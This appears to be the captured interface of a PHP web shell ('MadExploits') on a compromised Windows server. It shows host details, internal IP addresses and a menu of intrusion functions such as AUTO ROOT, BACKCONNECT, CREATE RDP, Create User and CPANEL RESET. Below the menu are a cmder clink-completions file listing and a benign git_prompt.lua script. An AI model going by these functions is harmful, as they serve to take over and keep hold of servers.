Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
cmder /
vendor /
clink-completions /
[ HOME SHELL ]
Name
Size
Permission
Action
.vscode
[ DIR ]
drwxrwxrwx
modules
[ DIR ]
drwxrwxrwx
spec
[ DIR ]
drwxrwxrwx
.appveyor.yml
616
B
-rw-rw-rw-
.busted
116
B
-rw-rw-rw-
.cmderver
16
B
-rw-rw-rw-
.gitignore
89
B
-rw-rw-rw-
.init.lua
195
B
-rw-rw-rw-
.luacheckrc
206
B
-rw-rw-rw-
.luacov
162
B
-rw-rw-rw-
LICENSE
1.06
KB
-rw-rw-rw-
README.md
2.05
KB
-rw-rw-rw-
RELEASENOTES.md
8.23
KB
-rw-rw-rw-
angular-cli.lua
4.29
KB
-rw-rw-rw-
chocolatey.lua
4.74
KB
-rw-rw-rw-
coho.lua
2.88
KB
-rw-rw-rw-
cordova.lua
2.99
KB
-rw-rw-rw-
dotnet.lua
5.59
KB
-rw-rw-rw-
git.lua
29.43
KB
-rw-rw-rw-
git_prompt.lua
3.25
KB
-rw-rw-rw-
kubectl.lua
1.92
KB
-rw-rw-rw-
net.lua
1.16
KB
-rw-rw-rw-
npm.lua
6.41
KB
-rw-rw-rw-
nvm.lua
1.06
KB
-rw-rw-rw-
pip.lua
5.4
KB
-rw-rw-rw-
pipenv.lua
3.85
KB
-rw-rw-rw-
scoop.lua
7.75
KB
-rw-rw-rw-
ssh.lua
1.02
KB
-rw-rw-rw-
test.bat
48
B
-rwxrwxrwx
vagrant.lua
4.11
KB
-rw-rw-rw-
yarn.lua
4.63
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : git_prompt.lua
local gitutil = require('gitutil') -- TODO: cache config based on some modification indicator (system mtime, hash) -- this code is stolen from https://github.com/Dynodzzo/Lua_INI_Parser/blob/master/LIP.lua -- Resolve licensing issues before exposing local function load_ini(fileName) assert(type(fileName) == 'string', 'Parameter "fileName" must be a string.') local file = io.open(fileName, 'r') if not file then return nil end local data = {}; local section; for line in file:lines() do local tempSection = line:match('^%[([^%[%]]+)%]$'); if tempSection then section = tonumber(tempSection) and tonumber(tempSection) or tempSection; data[section] = data[section] or {} end local param, value = line:match('^%s-([%w|_]+)%s-=%s+(.+)$') if(param and value ~= nil)then if(tonumber(value))then value = tonumber(value); elseif(value == 'true')then value = true; elseif(value == 'false')then value = false; end if(tonumber(param))then param = tonumber(param); end data[section][param] = value end end file:close(); return data; end --- -- Escapes every non-alphanumeric character in string with % symbol. This is required -- because string.gsub treats plain strings with some symbols (e.g. dashes) as regular -- expressions (taken from http://stackoverflow.com/a/34953646) -- @param {string} text Text to escape -- @returns {string} Escaped text --- local function escape(text) return text and text:gsub("([^%w])", "%%%1") or "" end local git = {} git.get_config = function (git_dir, section, param) if not git_dir then return nil end if (not param) or (not section) then return nil end local git_config = load_ini(git_dir..'/config') if not git_config then return nil end return git_config[section] and git_config[section][param] or nil end local function git_prompt_filter() -- Check for Cmder configured Git Status Opt In/Out - See: https://github.com/cmderdev/cmder/issues/2484 if cmderGitStatusOptIn == false then return false end -- luacheck: globals cmderGitStatusOptIn local git_dir = gitutil.get_git_dir() if not git_dir then return false end -- if we're inside of git repo then try to detect current branch local branch = gitutil.get_git_branch(git_dir) if not branch then return false end -- for remote and ref resolution algorithm see https://git-scm.com/docs/git-push local remote_to_push = git.get_config(git_dir, 'branch "'..branch..'"', 'remote') or '' local remote_ref = git.get_config(git_dir, 'remote "'..remote_to_push..'"', 'push') or git.get_config(git_dir, 'push', 'default') local text = remote_to_push if (remote_ref) then text = text..'/'..remote_ref end if (text == '') then clink.prompt.value = clink.prompt.value:gsub(escape('('..branch), '%1'..text) else clink.prompt.value = clink.prompt.value:gsub(escape('('..branch), '%1 -> '..text) end return false end -- Register filter with priority 60 which is greater than -- Cmder's git prompt filters to override them clink.prompt.register_filter(git_prompt_filter, 60)
Close